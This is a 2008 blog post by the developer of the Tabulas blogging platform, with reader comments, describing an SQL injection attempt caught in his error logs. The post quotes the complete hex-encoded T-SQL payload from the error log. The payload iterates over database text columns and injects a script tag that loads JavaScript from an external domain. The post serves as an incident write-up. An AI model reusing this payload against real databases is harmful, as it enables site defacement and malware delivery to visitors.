Journal
Archives Favs
Gallery
Videos
Friends
Followers
Content
Links Pages Files
roy
Roy Kim
San Diego, California, United States

About

The weblog of Roy Kim

Categories

 
September 14, 2008

hacking tabulas?

So during the duration of my Tabulas code refactoring, I've turned on all PHP fatal errors to log to disk, and all mySQL errors to be emailed to me. I got the following interesting error:

SELECT entry_id, entry_userid, entry_url, entry_title, entry_status, entry_created, entry_draft, entry_updated, entry_category, entry_comment, entry_iconid, entry_favorite, entry_sticky, entry_watching, entry_reading, entry_listening, entry_mood, entry_feeling, entry_html, entry_nl2br, entry_break, entry_commentcount, entry_related, entry_status_effective FROM entries, entry_metadata WHERE entries.entry_id = entry_metadata.entryid AND entry_userid = '106634' AND entry_status_effective IN (0) AND entry_updated < NOW() AND entry_draft = 0 ORDER BY entry_sticky DESC, entry_updated DESC LIMIT 6 OFFSET 0;DECLARE @S CHAR(4000);SET @S=CAST(
0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S);

How interesting! Somebody was using the offset parameter for entries to do an injection attack! However, the GET param looked like junk, till I showed it to Max, who de-hexed it:

This nice little code snippet looped through my whole database, and would update any textual fields with a JS script.

Upon further inspection, the JS code embedded an <IFRAME> which loaded a Chinese page. This page, in turn, had the wonderful code snippet:





I'm running a Mac, but it looks like the JS tries to exploit ActiveX and do something real evil. Good thing I have a shred of competency when it comes to programming!

					
					

						
						
						
						
					

				

				

					Posted by roy on September 14, 2008 at 08:44 PM  in Web Development, Tabulas  | 4 Comments
				

			
Related Entries
Want to comment with Tabulas?. Please login.



	

		
Aaron Fulkerson (guest)

		
Comment posted on September 16th, 2008 at 01:03 PM
That's pretty cool really.
Reply to this comment

	











	

		
aphrodisiac

		
Comment posted on September 16th, 2008 at 02:38 AM
i can see that you blurred the link, but we could still see it in title bar of your mac.;)
Reply to this comment

	











	

		
sanjuro (guest)

		
Comment posted on September 15th, 2008 at 01:44 PM
Interesting, but... it was just injected using the GET method and he did manage to append his code to the query? Sounds serious.



That reminds me also I have an error showing up in my profile page: http://sanjuro.tabulas.com/profile (don't pay attention to the rest of the blog, I need to erase everything and rebuild... someday)
Reply to this comment

	











	

		
hapy

		
Comment posted on September 15th, 2008 at 08:05 AM
yeah, i tried hacking it to see if it was worthy of holding my thoughts in private.
Reply to this comment